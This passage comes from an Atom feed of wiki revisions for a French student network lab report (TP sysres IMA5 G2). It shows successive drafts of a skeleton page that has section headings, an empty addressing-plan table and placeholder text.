| x&lt;br /&gt;
| x&lt;br /&gt;
| x&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= 3. Configuration des Machines Virtuelles =&lt;br /&gt;
&lt;br /&gt;
[insérer résumé]&lt;br /&gt;
&lt;br /&gt;
= Architecture réseau =&lt;br /&gt;
&lt;br /&gt;
== L'architecture générale ==&lt;br /&gt;
&lt;br /&gt;
== Les réseaux virtuels ==&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv4) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv6) ==&lt;br /&gt;
[insérer résumé]&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56085</id>
		<title>TP sysres IMA5 2021/2022 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56085"/>
				<updated>2021-10-11T16:37:57Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Wiki compte-rendu de TP PRA - Aviran Tetia &amp;amp; Robin Lasserye&lt;br /&gt;
&lt;br /&gt;
= 1. Configuration du Réseau physique = &lt;br /&gt;
&lt;br /&gt;
[insérer image]&lt;br /&gt;
&lt;br /&gt;
= 2. Plan d'Adressage = &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! IP (privée) !! IP (publique) !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| x&lt;br /&gt;
| x&lt;br /&gt;
| x&lt;br /&gt;
| x&lt;br /&gt;
| x&lt;br /&gt;
| x&lt;br /&gt;
| x&lt;br /&gt;
| x&lt;br /&gt;
| x&lt;br /&gt;
| x&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= 3. Configuration des Machines Virtuelles =&lt;br /&gt;
&lt;br /&gt;
[insérer résumé]&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56084</id>
		<title>TP sysres IMA5 2021/2022 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56084"/>
				<updated>2021-10-11T16:36:37Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : /* 2. Plan d'Adressage */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Wiki compte-rendu de TP PRA - Aviran Tetia &amp;amp; Robin Lasserye&lt;br /&gt;
&lt;br /&gt;
= 1. Configuration du Réseau physique = &lt;br /&gt;
&lt;br /&gt;
[insérer image]&lt;br /&gt;
&lt;br /&gt;
= 2. Plan d'Adressage = &lt;br /&gt;
=Plan d'adressage=&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! IP (privée) !! IP (publique) !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| x&lt;br /&gt;
| x&lt;br /&gt;
| x&lt;br /&gt;
| x&lt;br /&gt;
| x&lt;br /&gt;
| x&lt;br /&gt;
| x&lt;br /&gt;
| x&lt;br /&gt;
| x&lt;br /&gt;
| x&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= 3. Configuration des Machines Virtuelles =&lt;br /&gt;
&lt;br /&gt;
[insérer résumé]&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56083</id>
		<title>TP sysres IMA5 2021/2022 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56083"/>
				<updated>2021-10-11T16:35:43Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Wiki compte-rendu de TP PRA - Aviran Tetia &amp;amp; Robin Lasserye&lt;br /&gt;
&lt;br /&gt;
= 1. Configuration du Réseau physique = &lt;br /&gt;
&lt;br /&gt;
[insérer image]&lt;br /&gt;
&lt;br /&gt;
= 2. Plan d'Adressage = &lt;br /&gt;
&lt;br /&gt;
[insérer résumé]&lt;br /&gt;
&lt;br /&gt;
= 3. Configuration des Machines Virtuelles =&lt;br /&gt;
&lt;br /&gt;
[insérer résumé]&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56078</id>
		<title>TP sysres IMA5 2021/2022 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56078"/>
				<updated>2021-10-11T16:30:53Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
= 1. Configuration du Réseau physique = &lt;br /&gt;
= 2. Plan d'Adressage = &lt;br /&gt;
= 3. Configuration réseau =&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56076</id>
		<title>TP sysres IMA5 2021/2022 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56076"/>
				<updated>2021-10-11T16:29:15Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;### 1. Configuration du réseau physique&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	</feed>